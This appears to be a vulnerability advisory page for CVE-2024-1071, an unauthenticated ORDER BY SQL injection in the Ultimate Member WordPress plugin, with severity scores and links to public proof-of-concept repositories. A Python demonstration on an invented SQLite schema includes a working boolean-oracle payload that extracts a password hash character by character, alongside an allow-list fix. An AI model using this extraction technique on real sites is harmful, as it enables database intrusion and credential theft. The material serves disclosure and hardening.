CVE-2024-1071
Description
The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
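The security-relevant detail in the description is where the input lands: a "sorting" value ends up inside ORDER BY. Placeholders in a prepared statement can bind values but not identifiers or clause fragments, so "preparation" alone cannot fix this class of bug; the clause has to come from a server-side allow-list. The following added example (not the plugin's code, not its real schema or query, and not any of the public PoCs listed below) reproduces the pattern on a constructed SQLite schema: an endpoint that drops the sorting parameter straight into ORDER BY, a boolean oracle that reads a stored hash one character per request by observing which of two known row orders comes back, and an allow-listed version of the same endpoint that the oracle cannot reach. The allow-list is the standard hardening for sort parameters; the page does not state what the vendor's own patch changed.

```python
"""Constructed demonstration of an ORDER BY ("sorting") injection and its fix.

Added example: the tables, rows, column names and hash string are invented and
the database is an in-memory SQLite; nothing here is the Ultimate Member code.
"""
import sqlite3
from typing import List

# Constructed sample data (assumption: not the plugin's real schema or content).
SCHEMA = """
CREATE TABLE members (id INTEGER PRIMARY KEY, display_name TEXT, registered TEXT);
CREATE TABLE users   (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO members VALUES (1, 'alice', '2023-01-05');
INSERT INTO members VALUES (2, 'bob',   '2023-03-20');
INSERT INTO members VALUES (3, 'carol', '2023-02-11');
INSERT INTO users   VALUES (1, 'admin', '$P$Bsecrethashvalue');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def directory_vulnerable(conn: sqlite3.Connection, sorting: str) -> List[str]:
    """The bug class the advisory names: the request's sorting value is spliced
    into ORDER BY unescaped. A '?' placeholder could not replace it, because
    identifiers and clause fragments are not bindable parameters."""
    sql = f"SELECT display_name FROM members ORDER BY {sorting}"
    return [row[0] for row in conn.execute(sql)]


# Allow-list: the request selects one of these keys; the SQL never sees the raw value.
ALLOWED_SORTING = {
    "name":   "display_name ASC",
    "newest": "registered DESC",
    "oldest": "registered ASC",
}


def directory_hardened(conn: sqlite3.Connection, sorting: str) -> List[str]:
    """Hardened endpoint: unknown sorting values fall back to the default key
    instead of reaching the query, so expression injection is impossible."""
    order_by = ALLOWED_SORTING.get(sorting, ALLOWED_SORTING["name"])
    sql = f"SELECT display_name FROM members ORDER BY {order_by}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(position: int, guess: str) -> str:
    """Boolean ORDER BY oracle: sort by name when the guessed hash character is
    right, otherwise by registration date. The row order leaks one bit per request."""
    assert len(guess) == 1 and guess != "'"
    return (
        f"(CASE WHEN (SELECT substr(user_pass,{position},1) FROM users WHERE id=1)='{guess}' "
        f"THEN display_name ELSE registered END)"
    )


def leak_hash_prefix(conn: sqlite3.Connection, length: int,
                     alphabet: str = "$PB.0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") -> str:
    """Recover the first `length` characters of the stored hash through the
    vulnerable endpoint by comparing each response against the known by-name order."""
    by_name = directory_vulnerable(conn, "display_name")  # baseline ordering
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if directory_vulnerable(conn, oracle_payload(pos, ch)) == by_name:
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, leaked prefix:", leak_hash_prefix(db, 8))
    print("hardened, same payload   :", directory_hardened(db, oracle_payload(1, "$")))
```

With the sample rows, sorting by name yields alice, bob, carol and sorting by registration date yields alice, carol, bob, so the two orders are distinguishable and the oracle recovers the hash prefix character by character; against the allow-listed endpoint the same payload is ignored and the default order is returned. Note that an allow-list is also what lets the endpoint keep supporting direction keywords such as DESC without exposing raw identifiers.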
NVD
Severity: N/A
CVE ID: CVE-2024-1071
CVSS Score: N/A
CVSS Metrics: NVD assessment not yet provided.
Wordfence
Severity: CRITICAL
CVE ID: CVE-2024-1071
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Proof Of Concept
Nuclei Templates for CVE-2024-1071
Reference: Project Discovery GitHub
gbrsh
Ultimate Member Unauthorized Database Access / SQLi
Reference: GitHub
Trackflaw
CVE-2024-1071 with Docker
Reference: GitHub
Matrexdz
CVE-2024-1071
Reference: GitHub
Matrexdz
Reference: GitHub